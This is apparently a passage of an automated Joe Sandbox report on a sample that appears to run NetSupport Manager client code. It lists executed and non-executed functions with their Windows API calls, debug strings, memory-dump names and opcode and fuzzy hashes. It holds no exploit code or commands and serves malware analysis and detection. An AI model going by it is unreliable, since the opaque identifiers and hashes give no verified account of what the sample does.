                                                                                        Function 11163DB7 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                        • __lock_file.LIBCMT ref: 11163DFE
                                                                                          • Part of subcall function 1116AF99: __lock.LIBCMT ref: 1116AFBE
                                                                                        • __fclose_nolock.LIBCMT ref: 11163E09
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                        • String ID:
                                                                                        • API String ID: 2800547568-0
                                                                                        • Opcode ID: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                        • Instruction ID: 92e00479c768bfe57184568fb50af5c8f285ad3b4a4164507b2fffc520e9ca87
                                                                                        • Opcode Fuzzy Hash: 7e8abcb520b3f17e3ade4ddc40c81544b3d820678823afdad6ab473755d4e59e
                                                                                        • Instruction Fuzzy Hash: 5CF0F6348143079ED7119B79D80078EFBA86F0033CF518248C0289A0C0CBFA6521CE56
                                                                                        Function 11144EA0 Relevance: 2.6, APIs: 2, Instructions: 58sleepCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 11144DC0: ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,NSM.LIC), ref: 11144DE7
                                                                                          • Part of subcall function 11163FED: __fsopen.LIBCMT ref: 11163FFA
                                                                                        • GetLastError.KERNEL32(?,02B4B870,000000FF,?), ref: 11144ED5
                                                                                        • Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02B4B870,000000FF,?), ref: 11144EE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: EnvironmentErrorExpandLastSleepStrings__fsopen
                                                                                        • String ID:
                                                                                        • API String ID: 3768737497-0
                                                                                        • Opcode ID: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                        • Instruction ID: cc8fd34c32098476147d622d57126809c91a32baa97f0e350d3592d26a0b2836
                                                                                        • Opcode Fuzzy Hash: 31fc0bde93ac12b3b57265c96de8f634bcc1559677f471cf9725baf87a88f7fc
                                                                                        • Instruction Fuzzy Hash: 8D110875D4411AEBD7119F94C9C4A6EF3BCEF85A29F200164FC0497A00E775AD11C7A3
                                                                                        Function 110106C0 Relevance: 1.7, APIs: 1, Instructions: 151COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 11010774
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: LockitLockit::_std::_
                                                                                        • String ID:
                                                                                        • API String ID: 3382485803-0
                                                                                        • Opcode ID: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                        • Instruction ID: 0f97abe7109b731a14a0a5233c6982db04001c22e931a1e4a38e375530e3522e
                                                                                        • Opcode Fuzzy Hash: b33c3b2a793c511d1b6f960a0ad5a8f3eee08100d5ee20f4381cce5b941f1766
                                                                                        • Instruction Fuzzy Hash: D9515D74E00645DFDB04CF98C980AADBBF5BF88318F24829DD5869B385C776E942CB90
                                                                                        Function 11143000 Relevance: 1.6, APIs: 1, Instructions: 70registryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegQueryValueExA.KERNEL32(00000000,?,?,00000000,00000000,00000000,1110F4CB,75BF8400,?,?,1114515F,00000000,CSDVersion,00000000,00000000,?), ref: 11143020
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: QueryValue
                                                                                        • String ID:
                                                                                        • API String ID: 3660427363-0
                                                                                        • Opcode ID: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                        • Instruction ID: 1cdda14904265755d753c391d3c49599355d775305d59026304f2c7825c43cec
                                                                                        • Opcode Fuzzy Hash: c6c1c190ce3e4d21182f90f0e4bfd6bcd18f91cafc0a2026145ecac98104bfaa
                                                                                        • Instruction Fuzzy Hash: 5D1193716282655AEB218E14D690BAFFBAAEFC5B24F30836AE51547E04C3329886C750
                                                                                        Function 110FACC0 Relevance: 1.6, APIs: 1, Instructions: 56COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: InformationToken
                                                                                        • String ID:
                                                                                        • API String ID: 4114910276-0
                                                                                        • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                        • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                        • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                        • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                        Function 11170166 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                          • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: AllocateHeap__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 328603210-0
                                                                                        • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                        • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                        • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                        • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                        Function 111672E3 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __waccess_s
                                                                                        • String ID:
                                                                                        • API String ID: 4272103461-0
                                                                                        • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                        • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                        • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                        • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                        Function 11163FED Relevance: 1.5, APIs: 1, Instructions: 10COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: __fsopen
                                                                                        • String ID:
                                                                                        • API String ID: 3646066109-0
                                                                                        • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                        • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                        • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                        • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                        Function 00F01000 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _NSMClient32@8.PCICL32(?,?,?,00F010A2,00000000), ref: 00F0100B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4131565154.0000000000F01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00F00000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4131549170.0000000000F00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4131581542.0000000000F02000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_f00000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: Client32@8
                                                                                        • String ID:
                                                                                        • API String ID: 433899448-0
                                                                                        • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                        • Instruction ID: c9e434760e1d31b5fb472ae86b3b4a4d965354d8358527ab853451bce9d527e3
                                                                                        • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                        • Instruction Fuzzy Hash: 91B092B221434D9BC714EF98EC41C7B739CBA98700B400909BD4543282CA65FC60E671

                                                                                        Non-executed Functions

                                                                                        Function 110EB120 Relevance: 29.9, APIs: 8, Strings: 9, Instructions: 141windowtimeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 1105DD10: __wcstoi64.LIBCMT ref: 1105DD4D
                                                                                        • wsprintfA.USER32 ref: 110EB1B8
                                                                                        • GetTickCount.KERNEL32 ref: 110EB212
                                                                                        • SendMessageA.USER32(?,0000004A,?,?), ref: 110EB226
                                                                                        • GetTickCount.KERNEL32 ref: 110EB22E
                                                                                        • SendMessageTimeoutA.USER32(?,0000004A,?,?,00000000,?,?), ref: 110EB276
                                                                                        • OpenEventA.KERNEL32(00000002,00000000,runplugin.dmp.1,?,00000001), ref: 110EB2A8
                                                                                        • SetEvent.KERNEL32(00000000,?,00000001), ref: 110EB2B5
                                                                                        • CloseHandle.KERNEL32(00000000,?,00000001), ref: 110EB2BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CountEventMessageSendTick$CloseHandleOpenTimeout__wcstoi64wsprintf
                                                                                        • String ID: %s$DATA$Error. Runplugin is unresponsive$INIT$TracePlugins$Warning: SendMessage to Runplugin took %d ms (possibly unresponsive)$_debug$runplugin %s (hWnd=%x,u=%d,64=%d) $runplugin.dmp.1
                                                                                        • API String ID: 3451743168-2289091950
                                                                                        • Opcode ID: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                        • Instruction ID: f1114c107ee76d929ad16cd328bd8b6b93bc0bc6479e919ac6bcab8c7865c9c3
                                                                                        • Opcode Fuzzy Hash: 7081efb8229b45fa1a91f50154a3e59ac40d63dc77862fc88f6c1544d8f2fef1
                                                                                        • Instruction Fuzzy Hash: D441A675A012199FD724DFA5DC44FAEF7B8EF48319F0085AEE91AA7240D631A940CFB1
                                                                                        Function 11106100 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 1110612E
                                                                                        • EnterCriticalSection.KERNEL32(111F060C), ref: 11106137
                                                                                        • GetTickCount.KERNEL32 ref: 1110613D
                                                                                        • GetTickCount.KERNEL32 ref: 11106190
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C), ref: 11106199
                                                                                        • GetTickCount.KERNEL32 ref: 111061CA
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C), ref: 111061D3
                                                                                        • EnterCriticalSection.KERNEL32(111F060C), ref: 111061FC
                                                                                        • LeaveCriticalSection.KERNEL32(111F060C,00000000,?,00000000), ref: 111062C3
                                                                                          • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                          • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                          • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                          • Part of subcall function 110F0CF0: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106267,?), ref: 110F0D1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.4132521378.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                        • Associated: 00000005.00000002.4132504761.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132635171.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132682432.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132703581.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.4132721727.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_11000000_shv.jbxd
                                                                                        Yara matches
                                                                                        Similarity
                                                                                        • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                                        • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                                        • API String ID: 1574099134-3013461081
                                                                                        • Opcode ID: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
                                                                                        • Instruction ID: 01093d0ef8ba3b8d66a1f5e3f4838d53f0bc1b4d1e9212342b6ef41ebc516d7c
                                                                                        • Opcode Fuzzy Hash: e4cf314df931be329bed10d82e2fbe7145bba63e1bcfccc88a3091ef951cf9c4
